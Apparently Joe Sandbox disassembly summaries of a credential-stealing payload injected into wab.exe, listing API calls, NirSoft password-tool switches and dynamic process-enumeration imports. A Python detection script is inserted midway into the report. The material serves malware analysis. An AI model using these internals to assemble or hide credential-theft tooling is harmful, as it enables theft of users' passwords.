                                  • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                  • Part of subcall function 0040CC26: FindCloseChangeNotification.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                  • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                • memset.MSVCRT ref: 0040806A
                                • memset.MSVCRT ref: 0040807F
                                • _wtoi.MSVCRT ref: 004081AF
                                • _wcsicmp.MSVCRT ref: 004081C3
                                • memset.MSVCRT ref: 004081E4
                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,0000012E,000000FF,?,000003FF,00000000,00000000,0000012E,00000000,0000012D,?,?,?,?,?), ref: 00408218
                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040822F
                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408246
                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040825D
                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408274
                                  • Part of subcall function 00407FC3: _wtoi64.MSVCRT ref: 00407FC7
                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040828B
                                  • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E44
                                  • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E5B
                                  • Part of subcall function 00407E1E: _mbscpy.MSVCRT ref: 00407E7E
                                  • Part of subcall function 00407E1E: _mbscpy.MSVCRT ref: 00407ED7
                                  • Part of subcall function 00407E1E: _mbscpy.MSVCRT ref: 00407EEE
                                  • Part of subcall function 00407E1E: _mbscpy.MSVCRT ref: 00407F01
                                  • Part of subcall function 00407E1E: wcscpy.MSVCRT ref: 00407F10
                                  • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                  • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: ByteCharMultiWide$memset$_mbscpy$_wcsicmp$ChangeCloseFileFindNotificationSize_wtoi_wtoi64wcscpy
                                • String ID: logins$null
                                • API String ID: 3492182834-2163367763
                                • Opcode ID: 09a376002f14fa1f9e0d48ac719059c44ef41498ede045729c177772a5669da3
                                • Instruction ID: fdf7b148d119976dec4a4ca0125bd44813aaa3c4ab878784613783167982a03f
                                • Opcode Fuzzy Hash: 09a376002f14fa1f9e0d48ac719059c44ef41498ede045729c177772a5669da3
                                • Instruction Fuzzy Hash: 48713371904219AEEF10BBA2DD82DDF767DEF00318F10457FB508B61C2DA785E458BA9
                                APIs
                                  • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                • GetFileSize.KERNEL32(00000000,00000000,?,00000001,00000000,?,004089ED,?,?,?,0000001E,?,?,00000104), ref: 00408589
                                • ??2@YAPAXI@Z.MSVCRT ref: 0040859D
                                  • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                • memset.MSVCRT ref: 004085CF
                                • memset.MSVCRT ref: 004085F1
                                • memset.MSVCRT ref: 00408606
                                • strcmp.MSVCRT ref: 00408645
                                • _mbscpy.MSVCRT ref: 004086DB
                                • _mbscpy.MSVCRT ref: 004086FA
                                • memset.MSVCRT ref: 0040870E
                                • strcmp.MSVCRT ref: 0040876B
                                • ??3@YAXPAX@Z.MSVCRT ref: 0040879D
                                • CloseHandle.KERNEL32(?,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 004087A6
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: memset$File$_mbscpystrcmp$??2@??3@CloseCreateHandleReadSize
                                • String ID: ---
                                • API String ID: 3437578500-2854292027
                                • Opcode ID: c5c02c04611bcd29229c4833ebed6afde2d02892c84083fd30bc2caee93791c4
                                • Instruction ID: 4c5fbc017ddd4a43d5b0f69e9578b2b0908928dff5e121bfcb53d45818d158f6
                                • Opcode Fuzzy Hash: c5c02c04611bcd29229c4833ebed6afde2d02892c84083fd30bc2caee93791c4
                                • Instruction Fuzzy Hash: 256191B2C0421DAADF20DB948D819DEBBBCAB15314F1140FFE558B3141DA399BC4CBA9
                                APIs
                                • memset.MSVCRT ref: 0041087D
                                • memset.MSVCRT ref: 00410892
                                • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                • SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                • SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                • GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                • LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                • GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                • LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                • GetSysColor.USER32(0000000F), ref: 00410999
                                • DeleteObject.GDI32(?), ref: 004109D0
                                • DeleteObject.GDI32(?), ref: 004109D6
                                • SendMessageW.USER32(00000000,00001208,00000000,?), ref: 004109F3
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: MessageSend$DeleteHandleImageLoadModuleObjectmemset$ColorDirectoryFileInfoWindows
                                • String ID:
                                • API String ID: 1010922700-0
                                • Opcode ID: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
                                • Instruction ID: e9b684d61d60cc1afb152275eb3c8de820581b68aaecd99ee02cab8be193ddee
                                • Opcode Fuzzy Hash: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
                                • Instruction Fuzzy Hash: 48418575640304BFF720AF61DC8AF97779CFB09744F000829F399A51E1D6F6A8909B29
                                APIs
                                  • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                • malloc.MSVCRT ref: 004186B7
                                • ??3@YAXPAX@Z.MSVCRT ref: 004186C7
                                • GetFullPathNameW.KERNEL32(00000000,-00000003,00000000,00000000), ref: 004186DB
                                • ??3@YAXPAX@Z.MSVCRT ref: 004186E0
                                • GetFullPathNameA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186F6
                                • malloc.MSVCRT ref: 004186FE
                                • GetFullPathNameA.KERNEL32(00000000,-00000003,00000000,00000000), ref: 00418711
                                • ??3@YAXPAX@Z.MSVCRT ref: 00418716
                                • ??3@YAXPAX@Z.MSVCRT ref: 0041872A
                                • ??3@YAXPAX@Z.MSVCRT ref: 00418749
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: ??3@$FullNamePath$malloc$Version
                                • String ID: |A
                                • API String ID: 4233704886-1717621600
                                • Opcode ID: 66b970c2726a19c6cf161dcebd973c19408ec610aa0d83d05880a80435803f02
                                • Instruction ID: f8a1ad7f3386c3a0ca67e8408a701755caa4d882ef8d2f884b3bc60851bd4b4d
                                • Opcode Fuzzy Hash: 66b970c2726a19c6cf161dcebd973c19408ec610aa0d83d05880a80435803f02
                                • Instruction Fuzzy Hash: F5217432900118BFEF11BFA6DC46CDFBB79DF41368B22006FF804A2161DA799E91995D
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: _wcsicmp
                                • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                • API String ID: 2081463915-1959339147
                                • Opcode ID: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                                • Instruction ID: 8733bd8b557f913067c5021fbfe18d0583d9fd94efe92a6f612d034962822ca0
                                • Opcode Fuzzy Hash: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                                • Instruction Fuzzy Hash: A401843328931228FA2538663D07F834F48CB52BBBF32405BF800D81C6FE8C4565605E
                                APIs
                                  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004138ED
                                • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004138FE
                                • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 0041390F
                                • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00413920
                                • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 00413931
                                • FreeLibrary.KERNEL32(00000000), ref: 00413951
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                • API String ID: 2012295524-70141382
                                • Opcode ID: de34bece31b7142a998ab6ccb1b4abbedb6e98f3c738f5240e3b00242a7e4309
                                • Instruction ID: 1ed0e205fb1d3ca6b4a3c81c58fecbd4dea9624ac3f9f6029147382c5f000437
                                • Opcode Fuzzy Hash: de34bece31b7142a998ab6ccb1b4abbedb6e98f3c738f5240e3b00242a7e4309
                                • Instruction Fuzzy Hash: 7301B5B1905312DAD7705F31AE40B6B2FA45B81FA7B10003BEA00D1286DBFCC8C5DA6E
                                APIs
                                • GetModuleHandleW.KERNEL32(kernel32.dll,?,0041339D), ref: 0041384C
                                • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00413865
                                • GetProcAddress.KERNEL32(00000000,Module32First), ref: 00413876
                                • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00413887
                                • GetProcAddress.KERNEL32(00000000,Process32First), ref: 00413898
                                • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 004138A9
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: AddressProc$HandleModule
                                • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                • API String ID: 667068680-3953557276
                                • Opcode ID: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                • Instruction ID: ced2a49a11d8a5ad7e856d80fa96ce31c371be68fc2c17877008b9264e9f9212
                                • Opcode Fuzzy Hash: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                • Instruction Fuzzy Hash: 58F08631900317A9E7206F357D41B672AE45B86F83714017BFC04D12D9DB7CE98A9B6D
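The three function summaries above expose two things about the image injected into wab.exe at 0x400000 that are worth checking for directly in a dump: a `_wcsicmp` switch table of `/scomma`, `/shtml`, `/skeepass`, `/stab`, `/stabular`, `/sverhtml`, `/sxml`, which are the export switches of NirSoft's password-recovery utilities (the `www.nirsoft.net` HTML footer template elsewhere in this dump corroborates that), and two clusters of export names that are resolved at run time via `GetProcAddress` instead of the import table (psapi.dll process/module enumeration and kernel32 Toolhelp32). Both are stored as plain NUL-terminated strings, so a byte scan finds them. The script below is an added example, not part of the Joe Sandbox report or of the analysed sample; the buffer it scans is constructed to imitate the .rdata layout implied by the summaries (switches as UTF-16LE, API names as narrow strings) and is not the real dump. Thresholds and tag names are the author's choices.

```python
"""Triage scan of a process memory dump for NirSoft export switches and
run-time-resolved API name clusters (added example; constructed input)."""
import re
import sys

# Command-line export switches compared with _wcsicmp in the dumped image.
NIRSOFT_SWITCHES = [b"/scomma", b"/shtml", b"/skeepass", b"/stab",
                    b"/stabular", b"/sverhtml", b"/sxml"]

# Export names the image passes to GetProcAddress, grouped by the module
# it loads them from.
DYNAMIC_IMPORT_SETS = {
    "psapi.dll": [b"EnumProcesses", b"EnumProcessModules",
                  b"GetModuleBaseNameW", b"GetModuleFileNameExW",
                  b"GetModuleInformation"],
    "kernel32.dll toolhelp": [b"CreateToolhelp32Snapshot", b"Process32First",
                              b"Process32Next", b"Module32First",
                              b"Module32Next"],
}


def find_terminated(buf, name):
    """Offsets where `name` occurs as a NUL-terminated string, narrow or UTF-16LE.

    Requiring the terminator matters: '/stab' must not match inside
    '/stabular', and 'Process32First' must not be counted twice.
    """
    narrow = re.escape(name) + b"\x00"
    wide = re.escape(name.decode("ascii").encode("utf-16-le")) + b"\x00\x00"
    return sorted(m.start() for pat in (narrow, wide)
                  for m in re.finditer(pat, buf))


def scan_dump(buf):
    """Return which switches and which dynamically resolved names are present."""
    switches = {sw.decode(): find_terminated(buf, sw) for sw in NIRSOFT_SWITCHES}
    imports = {}
    for lib, names in DYNAMIC_IMPORT_SETS.items():
        present = {n.decode(): find_terminated(buf, n) for n in names}
        imports[lib] = {k: v for k, v in present.items() if v}
    return {"nirsoft_switches": {k: v for k, v in switches.items() if v},
            "dynamic_imports": imports}


def classify(result, min_switches=3, min_names=3):
    """Turn a scan result into triage tags.

    The dynamic-import tag on its own is weak evidence (plenty of legitimate
    software resolves Toolhelp32/psapi exports at run time); it is the
    combination with the NirSoft switch table inside a process that should
    be Windows Contacts (wab.exe) that is the signal.
    """
    tags = []
    if len(result["nirsoft_switches"]) >= min_switches:
        tags.append("embedded-nirsoft-tool")
    for lib, present in result["dynamic_imports"].items():
        if len(present) >= min_names:
            tags.append("dynamic-api-resolution:" + lib)
    return tags


def build_sample_dump():
    """Constructed stand-in for the 0x400000 image: NOT the real dump."""
    parts = [b"MZ" + b"\x00" * 62, b"\x90" * 256]
    for sw in NIRSOFT_SWITCHES:                       # wide, as _wcsicmp implies
        parts.append(sw.decode().encode("utf-16-le") + b"\x00\x00")
    parts.append(b"\x00" * 16)
    for name in DYNAMIC_IMPORT_SETS["psapi.dll"] + [b"psapi.dll"]:
        parts.append(name + b"\x00")                  # narrow GetProcAddress names
    for name in DYNAMIC_IMPORT_SETS["kernel32.dll toolhelp"] + [b"kernel32.dll"]:
        parts.append(name + b"\x00")
    parts.append(b"\x00" * 64)
    return b"".join(parts)


if __name__ == "__main__":
    # Usage: python scan.py [dump.bin]; without an argument the constructed
    # sample is scanned.
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_dump()
    res = scan_dump(data)
    for sw, offs in res["nirsoft_switches"].items():
        print(f"switch {sw:<10} at {[hex(o) for o in offs]}")
    for lib, present in res["dynamic_imports"].items():
        print(f"{lib}: {len(present)}/{len(DYNAMIC_IMPORT_SETS[lib])} names present")
    print("tags:", classify(res))
```

Run it against the `.sdmp` file the report names (`00000010.00000002.2560660031.0000000000400000...sdmp`) to confirm the same offsets the disassembly references; on a clean wab.exe image none of the switch strings should be present, so `classify` returns at most the weak dynamic-import tags.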
                                APIs
                                • GetDC.USER32(00000000), ref: 004121FF
                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041220A
                                • ReleaseDC.USER32(00000000,00000000), ref: 0041221F
                                • SetBkMode.GDI32(?,00000001), ref: 00412232
                                • SetTextColor.GDI32(?,00FF0000), ref: 00412240
                                • SelectObject.GDI32(?,?), ref: 00412251
                                • DrawTextExW.USER32(?,?,000000FF,?,00000024,?), ref: 00412285
                                • SelectObject.GDI32(00000014,00000005), ref: 00412291
                                  • Part of subcall function 00411FC6: GetCursorPos.USER32(?), ref: 00411FD0
                                  • Part of subcall function 00411FC6: GetSubMenu.USER32(?,00000000), ref: 00411FDE
                                  • Part of subcall function 00411FC6: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0041200F
                                • GetModuleHandleW.KERNEL32(00000000), ref: 004122AC
                                • LoadCursorW.USER32(00000000,00000067), ref: 004122B5
                                • SetCursor.USER32(00000000), ref: 004122BC
                                • PostMessageW.USER32(?,00000428,00000000,00000000), ref: 00412304
                                • memcpy.MSVCRT ref: 0041234D
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: Cursor$MenuObjectSelectText$CapsColorDeviceDrawHandleLoadMessageModeModulePopupPostReleaseTrackmemcpy
                                • String ID:
                                • API String ID: 1700100422-0
                                • Opcode ID: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                • Instruction ID: eb413d4c014922f01c1be241ee45634b3e5b5e29cfe5fc1015c733cb557b7a75
                                • Opcode Fuzzy Hash: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                • Instruction Fuzzy Hash: 0F61D331600109AFDB149F74CE89BEA77A5BB45300F10052AFA25D7291DBBC9CB1DB59
                                APIs
                                • GetClientRect.USER32(?,?), ref: 004111E0
                                • GetWindowRect.USER32(?,?), ref: 004111F6
                                • GetWindowRect.USER32(?,?), ref: 0041120C
                                • GetDlgItem.USER32(00000000,0000040D), ref: 00411246
                                • GetWindowRect.USER32(00000000), ref: 0041124D
                                • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0041125D
                                • BeginDeferWindowPos.USER32(00000004), ref: 00411281
                                • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 004112A4
                                • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 004112C3
                                • DeferWindowPos.USER32(?,?,00000000,00000000,000000DC,?,?,00000004), ref: 004112EE
                                • DeferWindowPos.USER32(?,00000000,00000000,00000000,?,?,000000DC,00000004), ref: 00411306
                                • EndDeferWindowPos.USER32(?), ref: 0041130B
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: Window$Defer$Rect$BeginClientItemPoints
                                • String ID:
                                • API String ID: 552707033-0
                                • Opcode ID: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                • Instruction ID: 1a89c9de14f4e003cb1acc22e2fe5cfe68aec74c13575a54a2aa846d798aa5ff
                                • Opcode Fuzzy Hash: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                • Instruction Fuzzy Hash: 3B41D375900209FFEB11DFA8DD89FEEBBBAFB48300F104469F655A61A0C771AA50DB14
                                APIs
                                • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,?,?,0040C255,?,?,*.*,0040C2BF,00000000), ref: 0040C0A4
                                  • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                • GetFileSize.KERNEL32(00000000,00000000), ref: 0040C0D4
                                  • Part of subcall function 0040BFF3: _memicmp.MSVCRT ref: 0040C00D
                                  • Part of subcall function 0040BFF3: memcpy.MSVCRT ref: 0040C024
                                • memcpy.MSVCRT ref: 0040C11B
                                • strchr.MSVCRT ref: 0040C140
                                • strchr.MSVCRT ref: 0040C151
                                • _strlwr.MSVCRT ref: 0040C15F
                                • memset.MSVCRT ref: 0040C17A
                                • CloseHandle.KERNEL32(00000000), ref: 0040C1C7
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: File$memcpystrchr$CloseCreateHandlePointerSize_memicmp_strlwrmemset
                                • String ID: 4$h
                                • API String ID: 4066021378-1856150674
                                • Opcode ID: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                                • Instruction ID: ad7b68c589633d756b108d453181f98220e50dbf4ed18f1a1dc8c2c6e1bbf79d
                                • Opcode Fuzzy Hash: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                                • Instruction Fuzzy Hash: F531C2B2800218FEEB20EB54CC85EEE73BCEF05354F14416AF508A6181D7389F558FA9
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: memset$_snwprintf
                                • String ID: %%0.%df
                                • API String ID: 3473751417-763548558
                                • Opcode ID: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                                • Instruction ID: e3e507119e413e1699737691dcc770ce903c50d69a4f0c7cc4f670013a5326e5
                                • Opcode Fuzzy Hash: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                                • Instruction Fuzzy Hash: 2D318F71800129BBEB20DF95CC85FEB77BCFF49304F0104EAB509A2155E7349A94CBA9
                                APIs
                                • SetTimer.USER32(?,00000041,00000064,00000000), ref: 004060C7
                                • KillTimer.USER32(?,00000041), ref: 004060D7
                                • KillTimer.USER32(?,00000041), ref: 004060E8
                                • GetTickCount.KERNEL32 ref: 0040610B
                                • GetParent.USER32(?), ref: 00406136
                                • SendMessageW.USER32(00000000), ref: 0040613D
                                • BeginDeferWindowPos.USER32(00000004), ref: 0040614B
                                • EndDeferWindowPos.USER32(00000000), ref: 0040619B
                                • InvalidateRect.USER32(?,?,00000001), ref: 004061A7
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
                                • String ID: A
                                • API String ID: 2892645895-3554254475
                                • Opcode ID: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                • Instruction ID: 3d646c34c65c30a23a549f03b0efc12359fcfb722ff8df3f2fd47db5f06942f8
                                • Opcode Fuzzy Hash: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                • Instruction Fuzzy Hash: 67318F75240304BBEB205F62DC85F6A7B6ABB44742F018539F3067A5E1C7F998A18B58
                                APIs
                                • LoadMenuW.USER32(?,?), ref: 0040D97F
                                  • Part of subcall function 0040D7A7: GetMenuItemCount.USER32(?), ref: 0040D7BD
                                  • Part of subcall function 0040D7A7: memset.MSVCRT ref: 0040D7DC
                                  • Part of subcall function 0040D7A7: GetMenuItemInfoW.USER32 ref: 0040D818
                                  • Part of subcall function 0040D7A7: wcschr.MSVCRT ref: 0040D830
                                • DestroyMenu.USER32(00000000), ref: 0040D99D
                                • CreateDialogParamW.USER32(?,?,00000000,0040D952,00000000), ref: 0040D9F2
                                • GetDesktopWindow.USER32 ref: 0040D9FD
                                • CreateDialogParamW.USER32(?,?,00000000), ref: 0040DA0A
                                • memset.MSVCRT ref: 0040DA23
                                • GetWindowTextW.USER32(00000005,?,00001000), ref: 0040DA3A
                                • EnumChildWindows.USER32(00000005,Function_0000D898,00000000), ref: 0040DA67
                                • DestroyWindow.USER32(00000005), ref: 0040DA70
                                  • Part of subcall function 0040D5D6: _snwprintf.MSVCRT ref: 0040D5FB
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
                                • String ID: caption
                                • API String ID: 973020956-4135340389
                                • Opcode ID: 5e414436bb8e275bf9a16e2693900a7463b03ad76ebaf029bad5c7ef584cf34d
                                • Instruction ID: d77e6bedd7727d4aace6f5c0bd160524984489d6dc7b24eaa8e7ecc9459ec1fc
                                • Opcode Fuzzy Hash: 5e414436bb8e275bf9a16e2693900a7463b03ad76ebaf029bad5c7ef584cf34d
                                • Instruction Fuzzy Hash: 60319072900208BFEF11AF91DC85EAA3B78FF04315F10843AF909A61A1D7799D58CF59
                                APIs
                                Strings
                                • <table dir="rtl"><tr><td>, xrefs: 00410B00
                                • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00410A70
                                • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00410ADD
                                • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00410B3C
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: memset$_snwprintf$wcscpy
                                • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                                • API String ID: 1283228442-2366825230
                                • Opcode ID: 2928c1e4db6f8540118cb54ef1ff53e3c28d5a36283f281326c9c00f9b8dcb63
                                • Instruction ID: da896b014e5ee892582fb8e7d48e4383de9842bc572d8210300f5843ce7472f7
                                • Opcode Fuzzy Hash: 2928c1e4db6f8540118cb54ef1ff53e3c28d5a36283f281326c9c00f9b8dcb63
                                • Instruction Fuzzy Hash: 5C2182B69002197BDB21AB95CC41EDE77BCAF08785F0040ABF549D3151DA789F888BA9
                                APIs
                                • wcschr.MSVCRT ref: 00413972
                                • wcscpy.MSVCRT ref: 00413982
                                  • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                  • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                  • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                • wcscpy.MSVCRT ref: 004139D1
                                • wcscat.MSVCRT ref: 004139DC
                                • memset.MSVCRT ref: 004139B8
                                  • Part of subcall function 00409DD5: GetWindowsDirectoryW.KERNEL32(0045DC58,00000104,?,00413A11,?,?,00000000,00000208,?), ref: 00409DEB
                                  • Part of subcall function 00409DD5: wcscpy.MSVCRT ref: 00409DFB
                                • memset.MSVCRT ref: 00413A00
                                • memcpy.MSVCRT ref: 00413A1B
                                • wcscat.MSVCRT ref: 00413A27
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
                                • String ID: \systemroot
                                • API String ID: 4173585201-1821301763
